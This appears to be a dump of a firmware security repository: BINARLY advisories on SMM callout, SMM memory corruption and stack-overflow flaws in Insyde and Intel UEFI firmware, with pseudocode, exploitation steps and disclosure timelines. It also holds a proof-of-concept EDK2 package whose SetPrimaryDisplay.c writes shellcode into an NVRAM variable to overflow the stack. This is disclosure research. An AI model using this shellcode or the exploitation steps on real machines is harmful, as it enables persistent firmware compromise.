2. Trigger the SW SMI Handler (SW SMI number and pointer to Communication Buffer are specified in UEFI ACPI table) via `0xB2` IO port. 76 | 77 | To fix this vulnerability, it is essential that all the input pointers (including the nested pointers) for SMI handlers are wrapped with sanity checks to make sure they are not pointing into SMRAM. 78 | 79 | ## Disclosure timeline 80 | 81 | This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. 82 | 83 | | Disclosure Activity | Date | 84 | | ------------------------------------- | -------------- | 85 | | CERT/CC created a case | 2021-09-27 | 86 | | Insyde PSIRT confirmed issue | 2021-09-29 | 87 | | Insyde PSIRT assigned CVE number | 2021-11-03 | 88 | | Insyde PSIRT provide patch release | 2021-11-09 | 89 | | BINARLY public disclosure date | 2022-02-01 | 90 | 91 | ## Acknowledgements 92 | 93 | **BINARLY efiXplorer team** 94 | -------------------------------------------------------------------------------- /Insyde/BRLY-2021-031.md: -------------------------------------------------------------------------------- 1 | # [BRLY-2021-031] 2 | 3 | # SMM callout vulnerability in combined DXE/SMM driver on BullSequana Edge server. 4 | 5 | ## Summary 6 | 7 | **BINARLY efiXplorer team** has discovered aSMM callout vulnerability on a BullSequana Edge server allowing a possible attacker to hijack execution flow of a code running in System Management Mode. Exploiting this issue could lead to escalating privileges to SMM. 8 | 9 | ## Vulnerability Information 10 | 11 | * BINARLY internal vulnerability identifier: BRLY-2021-031 12 | * CERT/CC assigned case number: [VU#796611](https://kb.cert.org/vuls/id/796611) 13 | * Insyde PSIRT assigned CVE identifier: [CVE-2021-43323](https://www.insyde.com/security-pledge/SA-2022016) 14 | * CVSS v3.1: 8.2 High AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H 15 | 16 | ## Affected BullSequana Edge server firmware with confirmed impact by BINARLY team 17 | 18 | | Package | File Name | SHA256 (File PE32 section) | File GUID | 19 | | --- | --- | --- | --- | 20 | | [BIOS_SKD080.18.02.003.sign.tar.gz](https://support.bull.com/ols/product/platforms/bullion/bullsequana-edge-servers/dl/pkgf/g/firmware-of-technical-state-016.02/bios-skd080-rev-80-18-02-build-003/view) | UsbCoreDxe | B8B990B3CEBE83304F38F3DD374E98C95A4557CC109B5F6FC62C4F52F0E2F215 | 31FD7EAF-80A7-435E-8E0A-3F185F8667DD | 21 | 22 | ## Potential impact 23 | 24 | An attacker can exploit this vulnerability to elevate privileges from ring 0 to ring -2, execute arbitrary code in System Management Mode - an environment more privileged than operating system (OS) and completely isolated from it. Running arbitrary code in SMM additionally bypasses SMM-based SPI flash protections against modifications, which can help an attacker to install a firmware backdoor/implant into the BIOS. Such a malicious firmware code in the BIOS could persist across operating system re-installs. Additionally, this vulnerability could potentially be used by threat actors to bypass security mechanisms provided by the UEFI firmware (for example, Secure Boot and some types of memory isolation for hypervisors). 25 | 26 | ## Vulnerability description 27 | 28 | The vulnerability exists in the SW SMI handler registered with number `0xFD` and located at offset `0x291C` in the driver: 29 | 30 | ```C++ 31 | EFI_STATUS SwSmiHandler(EFI_HANDLE DispatchHandle, const void *Context, void *CommBuffer, UINTN *CommBufferSize) 32 | { 33 | if ( *((_BYTE *)gUnknownProtocol2 + 0x19B2) ) 34 | { 35 | *((_QWORD *)gUnknownProtocol2 + 0x334) = 3; 36 | if ( !sub_8000717C((_QWORD *)gUnknownProtocol2 + 0x71) ) 37 | { 38 | (*((_QWORD *)gUnknownProtocol2 + 0x50) + 0xC0))(&unk_8000ABD0, sub_800018D8, v9); 39 | ... 40 | ``` 41 | 42 | As we can see, depending on the contents of a protocol pointed by `gUnknownProtocol2` a function is invoked pointed by a value extracted from it. This protocol is located and configured during the initialization procedure in the driver. 43 | 44 | ```C++ 45 | ... 46 | gUnknownProtocol2Guid = {"c965c76a-d71e-4e66-ab06-c6230d528425"}; 47 | gEfiBootServices->LocateProtocol(&gUnknownProtocol2Guid, 0, &UnknownProtocol2); 48 | ... 49 | ``` 50 | 51 | Hence, a possible attacker with a R/W access to system memory has an opportunity to find this protocol in the system memory and modify it to hook the function being called in the SW SMI handler to escalate privileges to SMM (ring -2). 52 | 53 | To exploit this vulnerability it is enough to: 54 | 55 | 1. Find `gUnknownProtocol2` protocol in system memory. 56 | 2. Overwrite `*((_QWORD *)gUnknownProtocol2 + 0x50) + 0xC0))()` function pointer in it with the shellcode address. 57 | 3. Trigger the SW SMI handler `0xFD` via `0xB2` IO port. 58 | 59 | To fix this vulnerability, it is essential that the usage of protocols from the system memory is minimised only to SMM driver's early initialization routine. 60 | 61 | ## Disclosure timeline 62 | 63 | This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. 64 | 65 | | Disclosure Activity | Date | 66 | | ------------------------------------- | -------------- | 67 | | CERT/CC created a case | 2021-09-27 | 68 | | Insyde PSIRT confirmed issue | 2021-09-29 | 69 | | Insyde PSIRT assigned CVE number | 2021-11-03 | 70 | | Insyde PSIRT provide patch release | 2021-11-09 | 71 | | BINARLY public disclosure date | 2022-02-01 | 72 | 73 | ## Acknowledgements 74 | 75 | **BINARLY efiXplorer team** 76 | -------------------------------------------------------------------------------- /Insyde/BRLY-2022-017.md: -------------------------------------------------------------------------------- 1 | # [BRLY-2022-017] 2 | # SMM callout vulnerability in SMM driver (SMM arbitrary code execution). 3 | 4 | ## Summary 5 | 6 | **BINARLY efiXplorer team** identified an SMM callout, which allows an attacker to access the System Management Mode and execute arbitrary code. 7 | 8 | ## Vulnerability Information 9 | 10 | * BINARLY internal vulnerability identifier: BRLY-2022-017 11 | * Insyde PSIRT assigned CVE identifier: CVE-2022-36338 12 | * FwHunt rule: [BRLY-2022-017](https://github.com/binarly-io/FwHunt/blob/main/rules/Vulnerabilities/Insyde/BRLY-2022-017.yml) 13 | * CVSS v3.1 7.5 High AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H 14 | 15 | ## Affected HP firmware with confirmed impact by Binarly team 16 | 17 | | Firmware | Module name | Module SHA256 | File GUID | 18 | | --- | --- | --- | --- | 19 | | Framework_Laptop_12th_Gen_Intel_Core_capsule_EFI_signed_allsku_3.01.bin | FwBlockServiceSmm | 76FA6B5D3F5E59FCD3CA6CDEF9B9D8F0C9B879AF13EFE25CF3E208B7358A6D0B | 74D936FA-D8BD-4633-B64D-6424BDD23D24 | 20 | 21 | ## Potential impact 22 | 23 | An attacker can exploit this vulnerability to elevate privileges from ring 0 to ring -2, execute arbitrary code in System Management Mode - an environment more privileged than operating system (OS) and completely isolated from it. Running arbitrary code in SMM additionally bypasses SMM-based SPI flash protections against modifications, which can help an attacker to install a firmware backdoor/implant into the BIOS. Such a malicious firmware code in the BIOS could persist across operating system re-installs. Additionally, this vulnerability potentially could be used by threat actors to bypass security mechanisms provided by the UEFI firmware (for example, Secure Boot and some types of memory isolation for hypervisors). 24 | 25 | ## Vulnerability description 26 | 27 | The vulnerable module registers a child SW SMI handler with GUID `2970687c-618c-4de5-b8f9-6c7576dca83d`: 28 | 29 | ```C++ 30 | gSmst->SmiHandlerRegister)(SmiHandler, &UNKNOWN_PROTOCOL_2970687C_GUID, &Handle); 31 | ``` 32 | 33 | The handler is located at offset `0x19D0`: 34 | 35 | ```C++ 36 | EFI_STATUS __fastcall SmiHandler(EFI_HANDLE DispatchHandle, const void *Context, void *CommBuffer, UINTN *CommBufferSize) 37 | { 38 | if ( CommBuffer && CommBufferSize && !gExitBootServicesFlag2EfiEventLegacyBootFlag ) 39 | { 40 | if ( !gUnknownProtocol74d936fa ) 41 | { 42 | if (gEfiBootServices->LocateProtocol)(&UNKNOWN_PROTOCOL_74D936FA_GUID, 0, &gUnknownProtocol74d936fa) < 0 ) 43 | return 0; 44 | ``` 45 | 46 | As we can see before `EFI_EVENT_EXIT_BOOT_SERVICES` is triggered, the handler will try to locate protocol `74d936fa-d8bd-4633-b64d-6424bdd23d24` using the `EFI_BOOT_SERVICES` which is located outside of SMRAM, hence this call could be hijacked by a possible attacker. 47 | 48 | Despite the vulnerability cannot be exploited from the operating system, using `EFI_BOOT_SERVICES` and `EFI_RUNTIME_SERVICES` is unsafe inside a code intended to run in SMM (from SMRAM) because an attacker capable of executing code in DXE phase could exploit this vulnerability to escalate privileges to SMM (ring -2). 49 | 50 | ## Disclosure timeline 51 | 52 | This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. 53 | 54 | | Disclosure Activity | Date | 55 | | ---------------------------------------- | ------------- | 56 | | Framework PSIRT is notified | 2022-06-27 | 57 | | Insyde PSIRT confirmed reported issue | 2022-07-19 | 58 | | Insyde PSIRT assigned CVE number | 2022-07-25 | 59 | | BINARLY public disclosure date | 2022-09-21 | 60 | 61 | ## Acknowledgements 62 | 63 | **BINARLY efiXplorer team** 64 | -------------------------------------------------------------------------------- /Insyde/BRLY-2022-020.md: -------------------------------------------------------------------------------- 1 | # [BRLY-2022-020] 2 | # The stack buffer overflow vulnerability leads to arbitrary code execution. 3 | 4 | ## Summary 5 | 6 | **BINARLY efiXplorer team** has discovered a stack buffer overflow vulnerability that allows a attacker to execute arbitrary code. 7 | 8 | ## Vulnerability Information 9 | 10 | * BINARLY internal vulnerability identifier: BRLY-2022-020 11 | * Insyde PSIRT assigned CVE identifier: [CVE-2022-35407](https://www.insyde.com/security-pledge/SA-2022040) 12 | * FwHunt rule: [BRLY-2022-020](https://github.com/binarly-io/FwHunt/blob/main/rules/Vulnerabilities/Insyde/BRLY-2022-020.yml) 13 | * CVSS v3.1 Score 7.7 High AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H 14 | 15 | ## Affected Insyde firmware with confirmed impact by Binarly team 16 | 17 | | Firmware | Module name | Module SHA256 | File GUID | 18 | | --- | --- | --- | --- | 19 | | Framework_Laptop_12th_Gen_Intel_Core_capsule_EFI_signed_allsku_3.01.bin | SetupUtility | f0f2cbcd94a31c7d202b0d99a24a2168ac3a877ce70cf92e7e416f20445d9f39 | fe3542fe-c1d3-4ef8-657c-8048606ff670 | 20 | 21 | ## Potential impact 22 | 23 | An attacker with local privileged access can exploit this vulnerability to elevate privileges from ring 3 or ring 0 (depends on the operating system) to a DXE Runtime UEFI application and execute arbitrary code. 24 | A malicious code installed as a result of the vulnerability exploitation in a DXE driver could survive across an operating system (OS) boot process and runtime or modify NVRAM area on SPI flash storage (to gain persistence on target platform). 25 | Additionally, this vulnerability potentially could be used by threat actors to bypass OS security mechanisms (modify privileged memory or runtime variables), influence on the OS boot process, and in some cases would allow an attacker to hook or modify EFI Runtime services. 26 | 27 | ## Vulnerability description 28 | 29 | The pseudocode of the vulnerable function is shown below: 30 | 31 | ```c++ 32 | EFI_STATUS sub_21468() 33 | { 34 | // [COLLAPSED LOCAL DECLARATIONS] 35 | 36 | memset(MeSetupStorageData, 0, 0x11); 37 | memset(MeBackupStorageData, 0, 0x11); 38 | DataSize = 1250; 39 | gRT->GetVariable(aSetup, &DRIVER_SAMPLE_FORM_SET_GUID, 0, &DataSize, Data); 40 | v4 = gBS->LocateProtocol(&ProprietaryProtocol_10, 0, &Interface); 41 | result = sub_2D178(v0); 42 | if ( !result && v4 >= 0 ) 43 | { 44 | DataSize = 17; 45 | gRT->GetVariable(L"MeSetupStorage", &gVariableGuid, 0, &DataSize, MeSetupStorageData); 46 | gRT->GetVariable(L"MeBackupStorage", &gVariableGuid, 0, &DataSize, MeBackupStorageData); 47 | DataSize = 54; 48 | gRT->GetVariable(aMesetup, &gVariableGuid, 0, &DataSize, &unk_119A20); 49 | sub_29338(v11); 50 | if... 51 | if... 52 | v2 = MeBackupStorageData[1]; 53 | if... 54 | if... 55 | if... 56 | v3 = MeBackupStorageData[6]; 57 | if... 58 | if... 59 | if... 60 | if... 61 | if... 62 | if... 63 | gRT->SetVariable(L"MeBackupStorage", &gVariableGuid, 2, 0x11, MeSetupStorageData); 64 | return gRT->SetVariable(aSetup, &DRIVER_SAMPLE_FORM_SET_GUID, 2, 0x4E2, Data); 65 | } 66 | return result; 67 | } 68 | ``` 69 | 70 | Consider following code snippet: 71 | 72 | ```c++ 73 | DataSize = 17; 74 | gRT->GetVariable(L"MeSetupStorage", &gVariableGuid, 0, &DataSize, MeSetupStorageData); 75 | gRT->GetVariable(L"MeBackupStorage", &gVariableGuid, 0, &DataSize, MeBackupStorageData); 76 | ``` 77 | 78 | A potential attacker can change the values of the `MeSetupStorage` and `MeBackupStorage` variables. 79 | If the size of the value of the `MeSetupStorageData` variable is greater than 17, then after the first call to the `gRT->GetVariable()` service, the `DataSize` variable will be overwritten (this means that the attacker is in control of the `DataSize` variable). 80 | The second call to `gRT->GetVariable()` (for the `MeBackupStorage` variable) can lead to a stack overflow and arbitrary code execution. 81 | 82 | ## Disclosure timeline 83 | 84 | This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. 85 | 86 | | Disclosure Activity | Date | 87 | | ---------------------------------------- | ------------- | 88 | | Framework PSIRT is notified | 2021-06-27 | 89 | | Insyde PSIRT confirmed reported issue | 2022-07-19 | 90 | | Insyde PSIRT assigned CVE number | 2022-07-27 | 91 | | Insyde provide patch release | 2022-11-04 | 92 | | BINARLY public disclosure date | 2023-03-21 | 93 | 94 | ## Acknowledgements 95 | 96 | **BINARLY efiXplorer team** 97 | -------------------------------------------------------------------------------- /Insyde/BRLY-2022-023.md: -------------------------------------------------------------------------------- 1 | # [BRLY-2022-023] 2 | 3 | # SMM memory corruption vulnerability in Software SMI handler 4 | 5 | ## Summary 6 | 7 | **BINARLY efiXplorer team** has discovered a SMM memory corruption vulnerability allowing a possible attacker to write fixed or predictable data to SMRAM. Exploiting this issue could lead to escalating privileges to SMM. 8 | 9 | ## Vulnerability Information 10 | 11 | * BINARLY internal vulnerability identifier: BRLY-2022-023 12 | * Insyde PSIRT assigned CVE identifier: CVE-2022-36448 13 | * FwHunt rule: [BRLY-2022-023](https://github.com/binarly-io/FwHunt/blob/main/rules/Vulnerabilities/Insyde/BRLY-2022-023.yml) 14 | * CVSS v3.1 8.2 High AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H 15 | 16 | ## Affected firmware with confirmed impact by Binarly team 17 | 18 | | Firmware | Module name | Module SHA256 | File GUID | 19 | | --- | --- | --- | --- | 20 | | Framework_Laptop_12th_Gen_Intel_Core_capsule_EFI_signed_allsku_3.01.bin | PnpSmm | 26939c77c4803ba2589975403d41fc1ddc8d1ecf23e207a4dadba3038b6c6664 | cc1baa36-11eb-45cc-9adc-7565e273ac70 | 21 | 22 | ## Potential impact 23 | 24 | An attacker can exploit this vulnerability to elevate privileges from ring 0 to ring -2, execute arbitrary code in System Management Mode - an environment more privileged than operating system (OS) and completely isolated from it. Running arbitrary code in the SMM additionally bypasses SMM-based SPI flash protections against modifications, which can help an attacker to install a firmware backdoor/implant into the BIOS. Such a malicious firmware code in the BIOS could persist across operating system re-installs. Additionally, this vulnerability potentially could be used by threat actors to bypass security mechanisms provided by the UEFI firmware (for example, Secure Boot and some types of memory isolation for hypervisors). 25 | 26 | ## Vulnerability description 27 | 28 | The vulnerability exists in the Software SMI handler (`SwSmiInputValue = 0x47`) located at offset `0x3690` in the module. 29 | The pseudocode of the vulnerable handler is shown below: 30 | 31 | ```c++ 32 | EFI_STATUS __fastcall SwSmiHandler( 33 | EFI_HANDLE DispatchHandle, 34 | const void *Context, 35 | void *CommBuffer, 36 | UINTN *CommBufferSize) 37 | { 38 | __int64 Ptr; 39 | __int16 Index; 40 | __int16 ResValue; 41 | UINTN Val; 42 | __int64 IhisiParamBufferValue; 43 | 44 | if ( ToGetIhisiParamBufferVar(&IhisiParamBufferValue, &Val, CommBuffer) >= EFI_SUCCESS ) 45 | { 46 | Ptr = IhisiParamBufferValue; 47 | if ( *(IhisiParamBufferValue + 16) == 'BSI$' ) 48 | { 49 | Index = *(*(IhisiParamBufferValue + 0x28) + 6); 50 | if ( (Index & 0xFFF8) == 80 ) // Index: 80, 81, 82, 83, 84, 85, 86, 87 51 | ResValue = (gFuncsTable[Index & 7])(*(IhisiParamBufferValue + 0x28)); 52 | else 53 | ResValue = 0x82; 54 | *(Ptr + 8) = ResValue; 55 | } 56 | } 57 | return 0; 58 | } 59 | ``` 60 | 61 | `IhisiParamBufferValue` will contain the NVRAM variable value: 62 | * name: `IhisiParamBuffer` 63 | * GUID: `92e59835-5f42-4e0b-9a84-47c7810ea806` 64 | * DataSize: `8` 65 | 66 | The `IhisiParamBuffer` variable contains an address that is not checked (except for the check for signature located at `IhisiParamBufferValue + 16`). 67 | 68 | As you can see from the pseudocode, a predictable value can be written by address `IhisiParamBufferValue + 8`. 69 | This can lead to DOS or execution of arbitrary code in SMM. 70 | 71 | ## Disclosure timeline 72 | 73 | This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. 74 | 75 | | Disclosure Activity | Date | 76 | | ---------------------------------------- | ------------- | 77 | | Framework PSIRT is notified | 2022-06-27 | 78 | | Insyde PSIRT confirmed reported issue | 2022-07-19 | 79 | | Insyde PSIRT assigned CVE number | 2022-07-25 | 80 | | BINARLY public disclosure date | 2022-09-21 | 81 | 82 | ## Acknowledgements 83 | 84 | **BINARLY efiXplorer team** 85 | -------------------------------------------------------------------------------- /Insyde/rsrc/PocPkg-BRLY-2021-021/PocPkg.dec: -------------------------------------------------------------------------------- 1 | [Defines] 2 | DEC_SPECIFICATION = 1.27 3 | PACKAGE_NAME = PocPkg 4 | PACKAGE_GUID = a7d99889-eab1-4a03-a65f-e2b1b407804c 5 | PACKAGE_VERSION = 1.00 6 | -------------------------------------------------------------------------------- /Insyde/rsrc/PocPkg-BRLY-2021-021/PocPkg.dsc: -------------------------------------------------------------------------------- 1 | [Defines] 2 | DSC_SPECIFICATION = 1.28 3 | PLATFORM_NAME = PocPkg 4 | PLATFORM_GUID = 0b79e762-783e-4448-b8e1-ca9659e9371a 5 | PLATFORM_VERSION = 1.00 6 | OUTPUT_DIRECTORY = Build/PocPkg 7 | SUPPORTED_ARCHITECTURES = X64 8 | BUILD_TARGETS = DEBUG|RELEASE|NOOPT 9 | SKUID_IDENTIFIER = DEFAULT 10 | 11 | [Components] 12 | PocPkg/Src/SetPrimaryDisplay.inf 13 | 14 | [LibraryClasses] 15 | UefiRuntimeLib|MdePkg/Library/UefiRuntimeLib/UefiRuntimeLib.inf 16 | UefiRuntimeServicesTableLib|MdePkg/Library/UefiRuntimeServicesTableLib/UefiRuntimeServicesTableLib.inf 17 | DevicePathLib|MdePkg/Library/UefiDevicePathLib/UefiDevicePathLib.inf 18 | UefiBootServicesTableLib|MdePkg/Library/UefiBootServicesTableLib/UefiBootServicesTableLib.inf 19 | MemoryAllocationLib|MdePkg/Library/UefiMemoryAllocationLib/UefiMemoryAllocationLib.inf 20 | RegisterFilterLib|MdePkg/Library/RegisterFilterLibNull/RegisterFilterLibNull.inf 21 | BaseMemoryLib|MdePkg/Library/BaseMemoryLib/BaseMemoryLib.inf 22 | PcdLib|MdePkg/Library/BasePcdLibNull/BasePcdLibNull.inf 23 | BaseLib|MdePkg/Library/BaseLib/BaseLib.inf 24 | DebugLib|MdePkg/Library/BaseDebugLibNull/BaseDebugLibNull.inf 25 | DebugPrintErrorLevelLib|MdePkg/Library/BaseDebugPrintErrorLevelLib/BaseDebugPrintErrorLevelLib.inf 26 | PrintLib|MdePkg/Library/BasePrintLib/BasePrintLib.inf 27 | UefiDriverEntryPoint|MdePkg/Library/UefiDriverEntryPoint/UefiDriverEntryPoint.inf 28 | UefiLib|MdePkg/Library/UefiLib/UefiLib.inf 29 | !if $(TARGET) == RELEASE 30 | DebugLib|MdePkg/Library/BaseDebugLibNull/BaseDebugLibNull.inf 31 | !else 32 | !ifdef $(DEBUG_ON_SERIAL_PORT) 33 | IoLib|MdePkg/Library/BaseIoLibIntrinsic/BaseIoLibIntrinsicSev.inf 34 | SerialPortLib|PcAtChipsetPkg/Library/SerialIoLib/SerialIoLib.inf 35 | DebugLib|MdePkg/Library/BaseDebugLibSerialPort/BaseDebugLibSerialPort.inf 36 | !else 37 | DebugLib|MdePkg/Library/UefiDebugLibConOut/UefiDebugLibConOut.inf 38 | !endif 39 | !endif 40 | 41 | [PcdsFixedAtBuild] 42 | # Define DEBUG_ERROR | DEBUG_VERBOSE | DEBUG_INFO | DEBUG_WARN to enable 43 | # logging at those levels. Also, define DEBUG_PROPERTY_ASSERT_DEADLOOP_ENABLED 44 | # and such. Assertion failure will call CpuDeadLoop. 45 | # https://github.com/tianocore/tianocore.github.io/wiki/EDK-II-Debugging 46 | gEfiMdePkgTokenSpaceGuid.PcdDebugPrintErrorLevel|0x80400042 47 | gEfiMdePkgTokenSpaceGuid.PcdDebugPropertyMask|0x2f 48 | -------------------------------------------------------------------------------- /Insyde/rsrc/PocPkg-BRLY-2021-021/Src/SetPrimaryDisplay.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | EFI_GUID gEfiGenericVariableGuid = {0x59d1c24f, 0x50f1, 0x401a, {0xb1, 0x01, 0xf3, 0x3e, 0x0d, 0xae, 0xd4, 0x43}}; 8 | 9 | /** 10 | * @brief The module entry point. 11 | */ 12 | EFI_STATUS 13 | EFIAPI 14 | SetPrimaryDisplayEntryPoint( 15 | IN EFI_HANDLE ImageHandle, 16 | IN EFI_SYSTEM_TABLE *SystemTable) 17 | { 18 | EFI_STATUS Status; 19 | UINTN DataSize = 145; 20 | UINT8 Data[] = { 21 | // some data (40 bytes) 22 | 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 23 | 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 24 | 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 25 | 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 26 | 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 27 | // shellcode address on stack (return address for parent function) 28 | 0x00, 0x35, 0xea, 0x07, 0x00, 0x00, 0x00, 0x00, 29 | // shellcode start 30 | 0xb8, 0x18, 0xe0, 0x9e, 0x07, 0xba, 0x02, 0x00, 31 | 0x00, 0x00, 0x4c, 0x8b, 0x40, 0x40, 0x4c, 0x89, 32 | 0xc1, 0x41, 0xff, 0x50, 0x28, 0xb8, 0x18, 0xe0, 33 | 0x9e, 0x07, 0xba, 0x31, 0x35, 0xea, 0x07, 0x4c, 34 | 0x8b, 0x40, 0x40, 0x4c, 0x89, 0xc1, 0x41, 0xff, 35 | 0x50, 0x08, 0xeb, 0xfc, 0x90, 0x90, 0x90, 0x90, 36 | 0x90, 0x53, 0x00, 0x75, 0x00, 0x63, 0x00, 0x63, 37 | 0x00, 0x65, 0x00, 0x73, 0x00, 0x73, 0x00, 0x66, 38 | 0x00, 0x75, 0x00, 0x6c, 0x00, 0x6c, 0x00, 0x79, 39 | 0x00, 0x20, 0x00, 0x65, 0x00, 0x78, 0x00, 0x70, 40 | 0x00, 0x6c, 0x00, 0x6f, 0x00, 0x69, 0x00, 0x74, 41 | 0x00, 0x65, 0x00, 0x64, 0x00, 0x10, 0x00, 0x00, 42 | 0x00}; 43 | 44 | Status = gRT->SetVariable(L"PrimaryDisplay", 45 | &gEfiGenericVariableGuid, 46 | EFI_VARIABLE_NON_VOLATILE | EFI_VARIABLE_BOOTSERVICE_ACCESS | EFI_VARIABLE_RUNTIME_ACCESS, 47 | DataSize, 48 | &Data); 49 | 50 | DebugPrint(DEBUG_INFO, 51 | "Setting PrimaryDisplay variable: GUID = %g, Size = %08x, Status = %r\n", 52 | gEfiGenericVariableGuid, 53 | DataSize, 54 | Status); 55 | 56 | return Status; 57 | } 58 | 59 | /** 60 | * @brief Handles unload request of this module. 61 | */ 62 | EFI_STATUS 63 | EFIAPI 64 | SetPrimaryDisplayUnload( 65 | IN EFI_HANDLE ImageHandle) 66 | { 67 | return EFI_SUCCESS; 68 | } 69 | -------------------------------------------------------------------------------- /Insyde/rsrc/PocPkg-BRLY-2021-021/Src/SetPrimaryDisplay.inf: -------------------------------------------------------------------------------- 1 | [Defines] 2 | INF_VERSION = 1.27 3 | BASE_NAME = SetPrimaryDisplay 4 | FILE_GUID = a642ceab-8be9-401a-801e-363db4caf3a8 5 | MODULE_TYPE = DXE_RUNTIME_DRIVER 6 | VERSION_STRING = 1.0 7 | ENTRY_POINT = SetPrimaryDisplayEntryPoint 8 | UNLOAD_IMAGE = SetPrimaryDisplayUnload 9 | 10 | [Sources] 11 | SetPrimaryDisplay.c 12 | 13 | [Packages] 14 | MdePkg/MdePkg.dec 15 | 16 | [LibraryClasses] 17 | UefiDriverEntryPoint 18 | UefiLib 19 | UefiRuntimeLib 20 | 21 | [Guids] 22 | 23 | [Depex] 24 | TRUE 25 | 26 | [BuildOptions.common.DXE_RUNTIME_DRIVER] 27 | # Detect use of deprecated interfaces if any. 28 | MSFT:*_*_*_CC_FLAGS = -D DISABLE_NEW_DEPRECATED_INTERFACES 29 | 30 | # Remove DebugLib library instances (ASSERT and such) from the RELEASE binary. 31 | # https://github.com/tianocore-docs/edk2-UefiDriverWritersGuide/blob/master/31_testing_and_debugging_uefi_drivers/314_debugging_code_statements/3141_configuring_debuglib_with_edk_ii.md 32 | MSFT:RELEASE_*_*_CC_FLAGS = -D MDEPKG_NDEBUG 33 | 34 | # By default, certain meta-data in the PE header is zeroed out to increase 35 | # compression ratio. Some of those information can be helpful for a debugger, 36 | # for example, to reconstruct stack trace. Leave it for such cases. See also, 37 | # https://edk2-docs.gitbooks.io/edk-ii-basetools-user-guides/content/GenFw.html 38 | MSFT:*_*_X64_GENFW_FLAGS = --keepexceptiontable --keepzeropending --keepoptionalheader 39 | -------------------------------------------------------------------------------- /Insyde/rsrc/poc-BRLY-2021-021.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/binarly-io/Vulnerability-REsearch/d187a2568cf00c5d328f33aa73bd1e8a72c45293/Insyde/rsrc/poc-BRLY-2021-021.png -------------------------------------------------------------------------------- /Insyde/rsrc/stack_state-BRLY-2021-021.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/binarly-io/Vulnerability-REsearch/d187a2568cf00c5d328f33aa73bd1e8a72c45293/Insyde/rsrc/stack_state-BRLY-2021-021.png -------------------------------------------------------------------------------- /Intel/BRLY-2022-038.md: -------------------------------------------------------------------------------- 1 | # [BRLY-2022-038] 2 | 3 | # Stack buffer overflow vulnerability leads to arbitrary code execution in a DXE driver on Intel platform. 4 | 5 | ## Summary 6 | 7 | **BINARLY efiXplorer team** has discovered a stack overflow vulnerability that allows a local root user to access a UEFI DXE driver and execute arbitrary code. 8 | 9 | ## Vulnerability Information 10 | 11 | * BINARLY internal vulnerability identifier: BRLY-2022-038 12 | * Intel PSIRT assigned CVE identifier: CVE-2023-22449 13 | * Intel advisory: [INTEL-SA-00917](https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00917.html) 14 | * CVSS v3.1: 8.2 High AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H 15 | 16 | ## Affected Intel firmware confirmed to be impacted by Binarly team 17 | 18 | | Device/Firmware | File Name | SHA256 (File PE32 section) | File GUID | 19 | | --- | --- | --- | --- | 20 | | Intel NUC M15 / BCTGL357 v0077 (Latest) | Setup | 3899216b9855aef3687f707e1b9e20a9843966c3e3b42af0e0ecd51617418a22 | 899407D7-99FE-43D8-9A21-79EC328CAC21 | 21 | 22 | ## Potential impact 23 | 24 | An attacker with local privileged access can exploit this vulnerability to elevate privileges from ring 3 or ring 0 (depends on the operating system) to a DXE driver and execute arbitrary code. Malicious code installed as a result of this exploitation could survive operating system (OS) boot process and runtime, or modify NVRAM area on the SPI flash storage (to gain persistence). Additionally, threat actors could use this vulnerability to bypass OS security mechanisms (modify privileged memory or runtime variables), influence OS boot process, and in some cases allow an attacker to hook or modify EFI Runtime services. 25 | 26 | ## Vulnerability description 27 | 28 | The vulnerability exists in the function located at offset `0x109A0`. 29 | The pseudocode for this function is shown below: 30 | 31 | ```c++ 32 | _BYTE *__fastcall HandleTpm12VersionInfoAndPCRBitmap(void *a1) 33 | { 34 | ... 35 | char Value[20]; 36 | EFI_GUID VendorGuid; 37 | UINTN DataSize; 38 | UINT32 SetupAttributes; 39 | UINTN DataSize; 40 | char Buffer[128]; 41 | char SetupValue[4787]; 42 | UINT32 Attributes; 43 | 44 | DataSize = 20; 45 | Attributes = 0; 46 | SetupDataSize = 0x12B3; 47 | VendorGuid.Data1 = 0xEC87D643; 48 | *&VendorGuid.Data2 = 0x4BB5EBA4; 49 | *VendorGuid.Data4 = 0x3E3FE5A1; 50 | *&VendorGuid.Data4[4] = 0xA90DB236; 51 | Res = gRT->GetVariable(L"Setup", &VendorGuid, &SetupAttributes, &SetupDataSize, SetupValue); 52 | if ( Res >= 0 ) 53 | { 54 | if ( gEfiHiiStringProtocol 55 | || (Res = gBS->LocateProtocol(&EFI_HII_STRING_PROTOCOL_GUID, 0, &gEfiHiiStringProtocol), Res >= 0) ) 56 | { 57 | Res = sub_1073C(a1); 58 | if ( Res ) 59 | { 60 | if ( !SetupValue[21] && !SetupValue[17] ) 61 | { 62 | ... 63 | if (gRT->GetVariable(L"Tpm12VersionInfo", &PEI_TCG_INTERNAL_FLAGS_GUID, &Attributes, &DataSize, Value) == EFI_SUCCESS) 64 | { 65 | ... 66 | } 67 | } 68 | Res = gRT->GetVariable(L"PCRBitmap", &PEI_TCG_INTERNAL_FLAGS_GUID, &Attributes, &DataSize, Value); 69 | if ( Res >= 0 ) 70 | { 71 | ... 72 | } 73 | } 74 | } 75 | } 76 | return Res; 77 | } 78 